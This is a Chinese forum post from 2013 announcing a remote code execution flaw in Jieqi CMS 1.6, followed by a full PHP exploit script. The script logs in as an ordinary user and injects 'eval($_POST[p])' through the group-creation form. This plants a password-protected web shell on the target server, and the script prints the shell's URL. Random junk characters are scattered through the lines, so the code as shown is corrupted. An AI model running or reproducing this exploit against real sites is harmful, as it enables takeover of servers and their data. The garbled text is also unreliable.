杰奇网站管理系统(简称 JIEQI CMS,中国国家版权局著作权登记号:2006SR03382)是一套模块化的网站架设系统,具备简单灵活、性能卓越、安全可靠等特性。我们为大家提供了目前最流行的杰奇小说连载系统、杰奇原创漫画系统及数字出版解决方案,并提供各类网站定制服务。2 w& j2 @9 |8 R9 W. _7 {7 ]* Z6 i' J* r1 x
! {+ ~# [. Q! d8 b: F ?
+ ]5 i/ Y& g+ l# L该系统存在多个远程安全漏洞,今天报告的这个是1.6版本的一个远程代码执行漏洞,应该有2年多历史了。
9 y+ a) a @0 G' c8 J" P% C( l 需要有一个能创建圈子的用户。# x. g- U* q8 }5 v- O0 Z
( f/ H1 Y# ]- Q' P7 N9 O# X
<?php* n# u/ F* C) `7 G- _
0 W/ F) O& [7 N; H. F6 i1 {
print_r('" w$ @# P8 f+ W H2 O
+---------------------------------------------------------------------------+) ?" d/ G& Q7 e U, R! |$ ?
Jieqi CMS V1.6 PHP Code Injection Exploit
8 G6 G: X5 T0 e8 _by flyh4t
4 V3 g+ C* [$ P; N) _mail: phpsec at hotmail dot com
1 V( ]& ~1 z4 Y% `: [% wteam: http://www.wolvez.org
6 \8 Q* M0 ?1 I5 F5 F2 _3 R/ Y+---------------------------------------------------------------------------+
/ M$ P |: Y4 p) a'); /**9 m# y ?; q+ ?2 d# S4 [
* works regardless of php.ini settings$ O5 B9 c) U# I/ @& Q' w; \. O
*/ if ($argc < 5) { print_r('
6 a8 g* Y+ C0 t$ v6 V+---------------------------------------------------------------------------+ Q' R, n( E3 L) }& G
Usage: php '.$argv[0].' host path username
' h [. `( R8 v6 Vhost: target server (ip/hostname)3 A: O, B: C0 s) v) l1 S+ X p
path: path to jieqicms $ y. x E5 n2 t p4 u P
uasename: a username who can create group1 Z E: J0 c& L/ H$ ~$ P
Example:4 N, y# S7 a9 M, M# Z/ S6 @* Q3 n
php '.$argv[0].' localhost /jieqicmsv1.6/ vipuser1 password) v1 t5 l; _* T9 D- _/ L
+---------------------------------------------------------------------------+$ `) [7 P0 b5 @. h
'); exit; } error_reporting(7); ini_set('max_execution_time', 0); $host = $argv[1]; $path = $argv[2]; $username = $argv[3]; $password = $argv[4]; /*get cookie*/ $cookie_jar_index = 'cookie.txt'; $url1 = "http://$host/$path/login.php"; $params = "password=$password&username=$username&usecookie=86400&submit=%26%23160%3B%B5%C7%26%23160%3B%26%23160%3B%C2%BC%26%23160%3B&action=login&jumpreferer=1"; $curl1 = curl_init(); curl_setopt($curl1, CURLOPT_URL, $url1); curl_setopt($curl1, CURLOPT_COOKIEJAR, $cookie_jar_index); curl_setopt($curl1, CURLOPT_POST, 1); curl_setopt($curl1, CURLOPT_POSTFIELDS, $params); ob_start(); $data1 = curl_exec($curl1); if ($data1 === FALSE) { echo "cURL Error: " . curl_error($ch); exit('exploit failed'); } curl_close($curl1); ob_clean(); /*get shell*/ $params ='-----------------------------23281168279961. s" {/ x1 H6 f! ?3 s; c
Content-Disposition: form-data; name="gname"1 D. y4 u6 T# v G5 G7 v
3 [. m! I5 g: ~4 p a
'; $params .="';"; $params .='eval($_POST[p]);//flyh4t
- _! r" R7 w# @& {6 E* x) g0 L-----------------------------23281168279961
# j" K+ d6 ~# ^! RContent-Disposition: form-data; name="gcatid"
* r$ p! q, l- r3 w! \3 s0 h1 V % J: S5 H1 H. E1 j x3 }
16 I% z# w. i3 p/ I6 M
-----------------------------23281168279961
/ {6 q: X6 C/ V& ]2 h' gContent-Disposition: form-data; name="gaudit"+ z* q4 N- B8 ^8 m! y* G) E
# n6 T6 T! U& y# F! X3 ~- R6 {1
4 ?' l: O/ [& J# M" ~$ ~% |% T-----------------------------232811682799618 i) B% U \; [: f4 @' p. x: ^
Content-Disposition: form-data; name="gbrief"5 X3 j6 W0 j$ {/ r/ s& z; h0 o
9 L" g9 L! g, ^# G6 S1 Z; Q0 r m1) e( ^3 o) ~; ]! V4 Q {3 }
-----------------------------23281168279961--
+ x& o A3 B+ \: R'; $url2 = "http://$host/$path/modules/group/create.php"; $curl2 = curl_init(); $header =array( 'Content-Type: multipart/form-data; boundary=---------------------------23281168279961' ); curl_setopt($curl2, CURLOPT_URL, $url2); curl_setopt($curl2, CURLOPT_HTTPHEADER, $header); curl_setopt($curl2, CURLOPT_COOKIEFILE, $cookie_jar_index); curl_setopt($curl2, CURLOPT_POST, 1); curl_setopt($curl2, CURLOPT_POSTFIELDS, $params); ob_start(); curl_exec($curl2); curl_close($curl2); $resp = ob_get_contents(); //$rs就是返回的内容 ob_clean(); www.2cto.com
( Y) R p0 `% [8 p% p
* k2 W/ W) @& p9 Q1 h$ Dpreg_match('/g=([0-9]{1,4})/', $resp, $shell); //print_r($shell); //print_r($resp); $url = "http://$host/$path/files/group/userdir/0/$shell[1]/info.php"; echo "view you shell here(password:p)\r\n" ; echo $url; |
发表于 2013-2-23 11:28:09
收藏
支持
反对